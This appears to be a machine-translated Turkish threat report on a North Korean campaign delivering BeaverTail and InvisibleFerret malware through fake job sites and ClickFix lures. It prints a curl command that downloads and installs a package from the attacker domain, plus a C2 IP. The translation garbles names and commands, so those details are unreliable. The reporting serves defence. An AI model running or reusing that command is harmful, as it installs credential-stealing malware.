Aldatıcı sahte işe alım platformları ve ClickFix sosyal mühendislik taktikleri aracılığıyla Beaverail kötü amaçlı yazılımların gelişmiş bir varyantını dağıtarak gelişmiş bir Kuzey Kore ulus-devlet tehdit oyuncusu kampanyası ortaya çıktı.
Mayıs 2025’ten bu yana aktif olan bu son kampanya, tehdit aktörleri pazarlama profesyonellerini, kripto para tüccarlarını ve perakende sektörü personelini takip etmek için geleneksel yazılım geliştirici hedeflerinin ötesine geçtikçe önemli bir taktiksel değişimi temsil ediyor.
Kötü amaçlı yazılım dağıtım altyapısı, Businesshire’da barındırılan hileli bir işe alım web sitesi etrafında merkezlenir[.]Üst, meşru bir işe alım platformu olarak maskeleniyor.
Site, dört Web3 kuruluşunda kripto para tüccar rolleri ve üç Web3 şirketinde satış veya pazarlama rolü ve ABD merkezli bir e-ticaret perakendecisi de dahil olmak üzere pozisyonlar sunuyor.
İş arayanlar sahte uygulama sürecinde zorunlu video yanıtları kaydetmeye çalıştıklarında, sorun giderme adımları olarak kötü amaçlı sistem komutlarını yürütmelerini gerektiren fabrikasyon teknik hatalarla karşılaşırlar.
GitLab analistleri, bu kampanyayı Nvidiasdk.fly adresinde barındıran tehdit oyuncunun arka uç hizmetini ortaya çıkaran altyapı analizi yoluyla tanımladı.[.]Dev yayından itibaren aktif olmaya devam ediyor.
Kampanya, JavaScript tercümanlarına güvenmek yerine, Beaverail’in JavaScript tercümanlarına güvenmek yerine bağımsız yürütülebilir ürünlere derlenmesi de dahil olmak üzere dikkate değer operasyonel iyileştirmeler gösterir.
Tehdit aktörleri, altyapıları boyunca sofistike kaçırma mekanizmaları uyguladılar.
Kötü niyetli hizmet, belirli sayısal başlıklar olmadan erişildiğinde meşru tuzak yükleri ile yanıt veren dinamik kullanıcı aracısı başlık doğrulamasını kullanır.
Örneğin, uygun başlıklar olmayan istekler, iyi huylu görsel -temel komut dosyaları ve meşru, imzalı NVIDIA yayın yürütülebilir dosyaları içeren arşivler alırken, “203” gibi başlıkları kullanan otantik enfeksiyon denemeleri gerçek Beaverail yüklerinin dağıtımını tetikler.
Teknik enfeksiyon zinciri analizi
Beavertail enfeksiyon mekanizması, işletim sistemlerinde önemli ölçüde değişir ve tehdit oyuncunun teknik karmaşıklığını ve platformlar arası hedeflemeye olan bağlılığını gösterir.
.webp)
MacOS sistemlerinde, ClickFix komutu, yük verisi içermeyen, ancak kötü amaçlı bir ön inşa komut dosyası yürüten com.nvidiahpc.pkg adlı meşru bir yükleyici paketini indirerek başlatır.
Bu komut dosyası,/Rominamabelramirez/Dify’de barındırılan bir GitHub deposundan ek bileşenler indirmeden önce standart olmayan ~/.myvars dosya konumundan depolanan şifreleri ekspiltrasyona çalışır.
Enfeksiyon zinciri, imzasız iki Mach-O ikilisi alan Downx64.sh’ın yürütülmesi yoluyla devam eder: soyulmuş Beaveril varyantını içeren x64NVIDIA ve InvisibleFerret’in pyinstaller birleştirilmiş bir versiyonu olan PayUniversal2.
Kötü amaçlı yazılım, yalnızca Python 3 ortak kurulum konumlarında kullanılamadığında veya Beaverail yürütme beklenen ~/.npc giriş noktası dosyasını on saniye içinde oluşturamadığında, InvisibleFerret ikili olarak yürütülen akıllı artıklık mekanizmaları sergiler.
curl - k - A 204 - o /var/tmp/ nvidia[.]pkg https[:]//nvidiasdk[.]fly[.]dev/nvs && 'sudo' installer - pkg /var/tmp/nvidia[.]pkg - target /Windows enfeksiyonları farklı bir yörünge izlerken, ClickFix komutu nvidia.tar.gz’yi indirirken, yeniden adlandırılmış 7ZIP yürütülebilir dosyası ve VisualBasic başlatıcı komut dosyası dahil olmak üzere birden fazla bileşen içeriyor.
Update.vbs komut dosyası çift işlevleri gerçekleştirir: parola korumalı python bağımlılıklarını, sabit kodlu “PPP” parolasını kullanarak gizli bir .pyp dizinine çıkarma ve birincil nvidiasdk’ı başlatma[.]Derlenmiş Beaverail varyantını içeren EXE Yürütülebilir.
Linux sistemleri, en aerodinamik enfeksiyon vektörünü alır, kötü amaçlı komut dosyaları doğrudan WGY aracılığıyla teslim edilir ve BASH yürütülmesine boruludur.
Komut dosyası, diğer platformlarda konuşlandırılan derlenmiş sürümlerle işlevsel olarak aynı olan Beaverail’in bir JavaScript sürümünü indirip yürütmeden önce nvm-sh yükleyicisi üzerinden Node.js yükler.
Bu varyant, önceki Beavertail yinelemelerine kıyasla daha az karmaşıklığı gösterir, tipik 22 yerine sadece sekiz tarayıcı uzantısını hedefler ve kromun ötesindeki tarayıcılar için özel veri çıkarma işlevlerini atlar.
Basitleştirilmiş kod tabanı, temel kötü amaçlı yazılım boyutunu yaklaşık üçte biri azaltırken, temel kimlik bilgisi çalma ve kripto para birimi cüzdanı hedefleme özelliklerini korur.
Komut ve Kontrol İletişimi IP adresini kullanın 172.86.93[.]139 “TTTTT” ile enfekte olmuş tüm sistemlerde kampanya tanımlayıcısı olarak hizmet vermektedir.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free